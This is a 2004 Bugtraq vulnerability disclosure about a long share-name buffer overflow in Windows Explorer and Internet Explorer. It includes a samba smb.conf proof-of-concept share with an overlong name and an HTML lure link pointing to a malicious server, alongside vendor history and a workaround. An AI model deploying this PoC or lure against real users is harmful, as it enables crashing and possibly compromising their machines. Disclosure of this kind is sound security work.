[34662] in bugtraq
Microsoft's Explorer and Internet Explorer long share name buffer overflow.
daemon@ATHENA.MIT.EDU (Rodrigo Gutierrez)
Mon Apr 26 12:49:39 2004
From: "Rodrigo Gutierrez" <rodrigo@intellicomp.cl>
To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>,
<submissions@packetstormsecurity.org>, <info@securiteam.com>
Date: Sun, 25 Apr 2004 17:38:24 -0400
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0003_01C42AEC.1C000BB0"
Message-Id: <20040425213223.7647A4077@etrn.gtdinternet.com>
------=_NextPart_000_0003_01C42AEC.1C000BB0
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sunday afternoon is a bit boring, and weather sucks down here in Santiago,
Chile so here we go...
The vuln is attached in TXT format, I would be gratefull if someone could
verify if it affects windows 2003 as well.
Rodrigo.-
------=_NextPart_000_0003_01C42AEC.1C000BB0
Content-Type: text/plain;
name="explorer-vuln.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="explorer-vuln.txt"
Microsoft Explorer and Internet Explorer Long Share Name Buffer =
Overflow.
Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>
Affected: MS Internet Explorer, MS Explorer (explorer.exe)=20
Windows XP(All), Windows 2000(All)
Not Tested: Windows 2003, Windows me, Windows 98, Windows 95
Vendor Status: i notified the vendor in the beginning of 2002, this
vulnerability was supposed to be fixed in xp service
pack 1 according to the vendors knowledge base article
322857.
Vendor url: =
http://support.microsoft.com/default.aspx?scid=3Dkb;en-us;322857
Background.
MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are=20
core pieces of Microsoft Windows Operating Systems.
Description
Windows fails to handle long share names when accessing a remote=20
file servers such as samba, allowing a malicious server to crash the=20
clients explorer and eventually get to execute arbitrary code in the=20
machine as the current user (usually with Administrator rights in =
windows
machines).
Analysis
In order to exploit this, an attacker must be able to get a user to =
connect=20
to a malicious server which contains a share name equal or longer than =
300
characters, windows wont allow you to create such a share, but of course =
samba=20
includes the feature ;). After your samba box is up and running create =
a=20
share in you smb.conf :
#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung
#------------ CUT HERE -------------
After your server is up, just get to your windows test box and get to =
the
start menu > run > \\your.malicious.server.ip., plufff, explorer will =
crash
:).
Social Engineering:
<a href=3D"\\my.malicious.server.ip">Enter My 0day sploit archive</a>
=20
Workaround.
From your network card settings disable the client for Microsoft =
networks=20
until a real fix for this vulnerability is available.
------=_NextPart_000_0003_01C42AEC.1C000BB0--
